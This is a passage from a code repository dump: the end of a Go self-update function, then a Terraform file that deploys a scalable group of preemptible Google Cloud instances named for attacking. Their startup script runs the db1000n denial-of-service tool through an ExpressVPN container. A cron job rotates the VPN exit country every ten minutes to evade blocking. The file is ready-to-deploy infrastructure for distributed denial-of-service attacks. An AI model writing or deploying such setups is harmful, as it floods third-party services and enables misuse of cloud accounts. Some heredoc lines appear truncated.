| latest, err := selfupdate.UpdateSelf(v, Repository) 109 | 110 | switch { 111 | case err != nil: 112 | return false, "", "", fmt.Errorf("binary update failed: %w", err) 113 | case latest.Version.Equals(v): 114 | return false, "", "", nil 115 | } 116 | 117 | return true, latest.Version.String(), latest.ReleaseNotes, nil 118 | } 119 | -------------------------------------------------------------------------------- /terraform/gcp_expressvpn/main.tf: -------------------------------------------------------------------------------- 1 | resource "google_service_account" "vm" { 2 | project = var.project_id 3 | account_id = "compute-sa" 4 | display_name = "Service Account for compute engine" 5 | } 6 | 7 | resource "google_project_iam_member" "vm_logs" { 8 | project = var.project_id 9 | role = "roles/logging.logWriter" 10 | member = "serviceAccount:${google_service_account.vm.email}" 11 | } 12 | 13 | resource "google_project_iam_member" "vm_metric" { 14 | project = var.project_id 15 | role = "roles/monitoring.metricWriter" 16 | member = "serviceAccount:${google_service_account.vm.email}" 17 | } 18 | 19 | resource "google_compute_instance_template" "atck" { 20 | name = "atck-template" 21 | machine_type = var.machine_type 22 | tags = ["default-allow-ssh"] 23 | 24 | metadata_startup_script = < /dev/null 37 | apt-get update 38 | apt-get install -y docker-ce docker-ce-cli containerd.io 39 | 40 | ulimit -n 30000 41 | ulimit -n 30000 42 | 43 | cat <> ./countries.txt 44 | Hong Kong 45 | Singapore 46 | India 47 | Canada 48 | Japan 49 | Germany 50 | Mexico 51 | Australia 52 | United Kingdom 53 | Netherlands 54 | Spain 55 | South Korea 56 | Switzerland 57 | France 58 | Philippines 59 | Malaysia 60 | Sri Lanka 61 | Italy 62 | Pakistan 63 | Kazakhstan 64 | Thailand 65 | Indonesia 66 | Taiwan 67 | Vietnam 68 | Macau 69 | Cambodia 70 | Mongolia 71 | Laos 72 | Myanmar 73 | Nepal 74 | Kyrgyzstan 75 | Uzbekistan 76 | Bangladesh 77 | Bhutan 78 | Brazil 79 | Panama 80 | Chile 81 | Argentina 82 | Bolivia 83 | Colombia 84 | Venezuela 85 | Ecuador 86 | Guatemala 87 | Peru 88 | Uruguay 89 | Bahamas 90 | Sweden 91 | Romania 92 | Turkey 93 | Ireland 94 | Iceland 95 | Norway 96 | Denmark 97 | Belgium 98 | Greece 99 | Portugal 100 | Austria 101 | Finland 102 | EOF 103 | 104 | sudo docker run \ 105 | --env=ACTIVATION_CODE=${var.expressvpn_key} \ 106 | --env=PREFERRED_PROTOCOL=auto \ 107 | --env=LIGHTWAY_CIPHER=auto \ 108 | --env=SERVER=$(shuf -n 1 /countries.txt) \ 109 | -e NETWORK=192.168.1.0/24 \ 110 | --cap-add=NET_ADMIN \ 111 | --device=/dev/net/tun \ 112 | --privileged \ 113 | --tty=true \ 114 | --name=vpn \ 115 | --detach=true \ 116 | --dns=1.1.1.1 \ 117 | --tty=true \ 118 | polkaned/expressvpn \ 119 | /bin/bash 120 | 121 | sleep 10 122 | 123 | cat <> ./run.sh 124 | #! /bin/bash 125 | docker stop db1000n 126 | docker exec vpn expressvpn disconnect 127 | docker exec vpn expressvpn connect "$(shuf -n 1 /countries.txt)" 128 | docker run --name=db1000n --pull=always --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --log-driver=gcplogs --rm -d ghcr.io/arriven/db1000n:latest 129 | EOF 130 | chmod +x ./run.sh 131 | 132 | (crontab -l ; echo '*/10 * * * * /usr/bin/sudo /run.sh') | crontab - 133 | 134 | docker run --name=db1000n --net=container:vpn -e PUID=1000 -e PGID=1000 -e ENABLE_PRIMITIVE=false --log-driver=gcplogs --rm -d ghcr.io/arriven/db1000n:latest 135 | 136 | EOT 137 | 138 | service_account { 139 | email = google_service_account.vm.email 140 | scopes = ["cloud-platform", "logging-write", "monitoring-write"] 141 | } 142 | 143 | network_interface { 144 | network = "default" 145 | access_config {} 146 | } 147 | 148 | disk { 149 | source_image = "projects/ubuntu-os-cloud/global/images/ubuntu-minimal-2004-focal-v20220203" 150 | auto_delete = true 151 | boot = true 152 | } 153 | 154 | scheduling { 155 | preemptible = true 156 | automatic_restart = false 157 | } 158 | } 159 | 160 | resource "google_compute_instance_group_manager" "attckrs" { 161 | name = "attckrs" 162 | base_instance_name = "atck" 163 | zone = var.machine_location 164 | target_size = var.machine_count 165 | 166 | version { 167 | instance_template = google_compute_instance_template.atck.id 168 | } 169 | } 170 | --------------------------------------------------------------------------------